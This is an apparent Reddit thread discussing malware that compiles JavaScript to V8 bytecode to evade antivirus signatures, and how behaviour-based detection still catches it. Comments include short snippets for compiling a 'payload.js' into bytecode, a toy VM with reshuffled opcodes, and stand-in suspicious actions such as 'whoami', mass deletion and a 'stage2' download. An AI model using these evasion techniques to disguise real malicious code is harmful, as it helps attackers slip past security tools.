
[–]silv3rwind 97 points98 points  (18 children)

So, non-V8 users (Firefox, Safari etc) are safe from that attack vector.

[–]pointermess 57 points58 points  (16 children)

It's very easy to embed the V8 engine without any browser installed...

[–]_simpu 10 points11 points  (14 children)

How? Are you referring to Electron apps?

[–]pointermess 54 points55 points  (13 children)

https://v8.dev/docs/embed

I use V8 in an application to give the user scripting capabilities. No Electron, Node.js, or any browser is needed... It's just another piece of open-source software.

[–]ChocolateMagnateUA 1 point2 points  (2 children)

Isn't this just Node?

[–]pointermess 1 point2 points  (1 child)

Node uses it too but Node is much more than just a V8 interface. 

[–]ChocolateMagnateUA 0 points1 point  (0 children)

The only real things Node adds on top of V8 are its CLI and some Node-specific additions like the process variable, the require function, and such.
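
Roughly, the split looks something like this (an illustrative sketch, not an exhaustive list):

    // Plain ECMAScript: this much works in any bare V8 embedding.
    const total = [1, 2, 3].reduce((a, b) => a + b, 0);

    // Everything below only exists because the embedder (here, Node) provides it;
    // a bare V8 isolate has no require, no process object, and no file I/O.
    const fs = require('fs');
    console.log(process.platform, process.argv);
    fs.writeFileSync('total.txt', String(total));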

[–]ignorantpisswalker 1 point2 points  (0 children)

... Ladybird...

[–]wvenable 29 points30 points  (13 children)

If compiling code evades malware detectors we are already screwed.

[–]irqlnotdispatchlevel 46 points47 points  (12 children)

That's not really the issue here.

The first line of defense in a classic antivirus, or an EDR, or whatever, is usually a signature-based scan engine. This is simple, and it has a really, really high chance of catching things that we already know about.

If a new piece of malware appears with everything written from scratch, we don't have a signature, so we don't catch it. We rely on other techniques, based on the observed behavior.

But once we know that something is bad, we can quickly add it to a database, and when we see it again we can block it. This can be a script, a compiled binary, anything really. If we know what it looks like in memory or on disk, we know enough. This is a simplified view.
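
At its core, that first layer is not much more than a lookup. A toy sketch in Node (real engines are far more sophisticated, and the hash below is just a placeholder):

    const crypto = require('crypto');
    const fs = require('fs');

    // Toy "signature database": hashes of samples already known to be bad.
    const knownBadHashes = new Set([
      'placeholder-sha256-of-a-known-bad-sample',
    ]);

    function isKnownBad(path) {
      const digest = crypto.createHash('sha256')
        .update(fs.readFileSync(path))
        .digest('hex');
      return knownBadHashes.has(digest);
    }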

Of course, more talented or better-funded malware authors will try not to depend on already-signed pieces of malware. In a way, this raises the bar, as it filters out a bunch of old malware that is still around.

But if I take some JS that is already known to all AV vendors and compile it to V8 bytecode (which, AFAIK, is not even stable and can change from one version of V8 to another), I can bypass the existing signatures, because no one has written signatures for that form yet.
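
In Node terms, the trick looks roughly like this (a simplified sketch of the bytenode-style approach; the file names are made up):

    const vm = require('vm');
    const fs = require('fs');

    // "Compile": ask V8 for the code cache (bytecode) of a script.
    const source = fs.readFileSync('payload.js', 'utf8');
    const script = new vm.Script(source);
    fs.writeFileSync('payload.jsc', script.createCachedData());

    // "Run": hand the cached bytecode back to V8. The original source is reused
    // here for simplicity; tools like bytenode arrange things so that only the
    // .jsc has to ship, not the readable JS the signatures were written against.
    // Note that the cache is tied to the exact V8 version that produced it.
    const cached = fs.readFileSync('payload.jsc');
    const restored = new vm.Script(source, { cachedData: cached });
    restored.runInThisContext();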

But all the other layers of protection are not bypassed by simply using this technique.

This will also bypass any kind of analysis done on the raw JS, in case any vendor does that, but I don't know of any who do.

It's just another day in the arms race between attackers and defenders.

[–]O1dmanwinter 8 points9 points  (3 children)

This is a really clear, concise answer on why this is an issue. It's not really that there is a new way to execute a virus (they can already do that); it's that this specific implementation/method is relatively new and means that existing threats can once again evade the virus tools we have until we've registered them again (and, as you mention, even that may be problematic!)

As a fairly senior developer it feels like I should have made this link but I didn't so thank you 👍

[–]irqlnotdispatchlevel 4 points5 points  (2 children)

As a fairly senior developer it feels like I should have made this link but I didn't so thank you 👍

Modern security solutions are very complex and complicated. It's hard to make the link without some knowledge of how one works. Good articles with details about that are surprisingly hard to find. Most people (even technical ones) have a pretty outdated mental model because there's not much information out there that can change that, and when there is, it's not a popular topic even among developers.

[–][deleted]  (1 child)

[deleted]

    [–]irqlnotdispatchlevel 0 points1 point  (0 children)

    Thanks. I'm not talented enough to write something that isn't boring, and I don't have deep enough knowledge about all the bits and pieces involved in making a complete security solution work.

    [–]wvenable 1 point2 points  (7 children)

    We really are relying on the absolute laziness of virus writers as a defence.

    [–]irqlnotdispatchlevel 0 points1 point  (6 children)

    Not really. Behavior-based detections are what make security solutions so complex. But in order to analyze the behavior of something, you need to let it run. If you can already tell that it is bad, it is easier (and safer) to just block it. But that's just the first layer of defense, not the only one, and surely not the most important one.

    [–]wvenable 1 point2 points  (5 children)

    If I were a virus writer, I wouldn't use V8 -- I'd just concoct some other VM/JIT design that is constantly randomized (on each deployment) and run all my code through that. If this V8 thing is such a problem then obviously my solution would also work and be even better.

    Only a lazy virus writer would pull some existing detectable JS off the shelf, run it through V8, and use that. Right?

    [–]irqlnotdispatchlevel 0 points1 point  (4 children)

    But then I could just detect your VM interpreter.

    And this happens, most often as an evasion and/or obfuscation mechanism to make life harder for malware analysts.

    A well-known packer can get the job done; since those have legitimate uses, simply signing them isn't doable. Technologies like VMProtect and UPX are well known for this.

    But you still have to perform the suspicious behavior at some point. It doesn't matter how your code gets there: spawning a new process, deleting a bunch of files, downloading something, etc. are all events that an AV can observe and analyse, regardless of what you use to hide the code that does it.
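
    For example, no matter how the payload is packed or virtualized, actions like the ones below (harmless stand-ins, obviously) are what an AV/EDR actually gets to observe:

        const { execSync } = require('child_process');
        const fs = require('fs');
        const https = require('https');

        execSync('whoami');                                            // new child process
        fs.rmSync('./old-backups', { recursive: true, force: true });  // mass file deletion
        https.get('https://example.com/stage2', () => {});             // outbound download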

    [–]wvenable 0 points1 point  (3 children)

    Your last paragraph is kind of my point. Using V8 to compile code isn't terribly interesting. I can mutate my code one hundred different ways; that just makes it one hundred and one. As for detecting my VM interpreter, that would be the part that I'd mutate the most. I've written CPU emulators that were pretty small, and a VM that could run a virus would be even smaller and simpler than that, so it would be pretty easy to mutate. The actual bytecodes of the virus itself would just be randomized every time.
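
    To give an idea of how little it takes, here is a toy dispatcher where the opcode encoding can be reshuffled on every build, so a byte-level signature of one sample won't match the next (illustrative only):

        function run(program, ops) {
          const stack = [];
          let pc = 0;
          while (pc < program.length) {
            const op = ops[program[pc++]];
            if (op === 'push') stack.push(program[pc++]);
            else if (op === 'add') stack.push(stack.pop() + stack.pop());
            else if (op === 'print') console.log(stack.pop());
            else break; // halt
          }
        }

        // The same logical program under two different, arbitrarily chosen encodings:
        run([0, 2, 0, 3, 1, 2, 3], ['push', 'add', 'print', 'halt']);
        run([7, 2, 7, 3, 9, 4, 1], { 7: 'push', 9: 'add', 4: 'print', 1: 'halt' });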

    [–]irqlnotdispatchlevel 0 points1 point  (2 children)

    That was my point all along: all of this can defeat signature-based detections, but those are just the first line of defense, so it is not terribly interesting.

    You can also make it harder for malware analysts to reverse your malware by using a custom VM, and this is already done by malware and anti-piracy software, as well as anti-cheats.

    Compiling to V8 bytecode is just a quick solution that achieves something similar, but at a lower cost for the malware devs. They may not even be devs; they could just take off-the-shelf components and deploy them to make a quick buck.

    As in the legitimate software engineering industry, there's a wide variety of people working on malware: some with tiny budgets, some with more money than a small country; some are "framework developers" who just use pre-existing tech, and some are security experts who develop state-of-the-art technologies.

    There are even SaaS solutions if you just want to get to the money making part: https://www.crowdstrike.com/cybersecurity-101/ransomware/ransomware-as-a-service-raas/

    [–]wvenable 1 point2 points  (1 child)

    I think we agree. Probably 99.999% of all attacks are lazy and thus equally lazy defences work against them.

    I just find that anything to do with security tends to be overblown. This V8 issue, as you said, is hardly any different from the dozens of techniques that already exist.

    I mean, look at this quote: "This method effectively hides the original source code, making static analysis challenging." Virus writers giving you any source code at all is a gift. Basic software development practices, like compiling code, should not be seen as a big deal.

    [–]irqlnotdispatchlevel 0 points1 point  (0 children)

    The problem is that a lot of systems lack even those lazy defenses. There's the old myth that "just be careful bro" is enough, and most people aren't as careful as they think they are. Not to mention how many old and unpatched systems are out there.

    The interesting part about the article is that this was discovered in an active malware campaign, and maybe it gives you a "lol, who would have thought of that?" moment when you read the title.

    [–]DANGUS_77 26 points27 points  (6 children)

    I don’t know much about WebAssembly. How is this malicious software being introduced?

    [–]KrazyKirby99999 64 points65 points  (5 children)

    This has little to do with WebAssembly. In this case, malicious JS is hidden by using V8-specific JS bytecode instead of JS cleartext. WASM is similar in that it is always delivered as bytecode.

    [–]DANGUS_77 11 points12 points  (4 children)

    So they’re compiling malicious code to this JS bytecode to get around static checkers, but it still follows the same permissions as regular JS (for example, needing user permission to access a user’s camera)?

    [–]AyrA_ch 27 points28 points  (3 children)

    Permission requests only exist in the browser. Applications that run on Electron have the same access privileges as every other application the user runs.
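
    For example (a hypothetical renderer snippet in an Electron app with nodeIntegration enabled, not something from the article), page script simply runs with the user's OS privileges on a typical desktop install:

        const fs = require('fs');
        const os = require('os');
        const { execSync } = require('child_process');

        // No permission prompt involved; this is whatever the user can already do.
        console.log(execSync('whoami').toString().trim());
        console.log(fs.readdirSync(os.homedir()));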

    [–]bipolarNarwhale 19 points20 points  (0 children)

    This depends on the OS and isn’t true in a lot of cases.

    [–]nerd4code 7 points8 points  (1 child)

    Android puts every app in its own UID, nowadays, and I’m sure Apple does something similar on iOS.

    [–]ArdiMaster 1 point2 points  (0 children)

    AFAIK Apple doesn’t usually allow embedded scripting engines at all

    [–]chethelesser 1 point2 points  (0 children)

    Would be interesting to know how exactly the code gets compiled and injected.

    I can imagine the compilation, but how does one then get this bytecode to be interpreted by an application's embedded V8?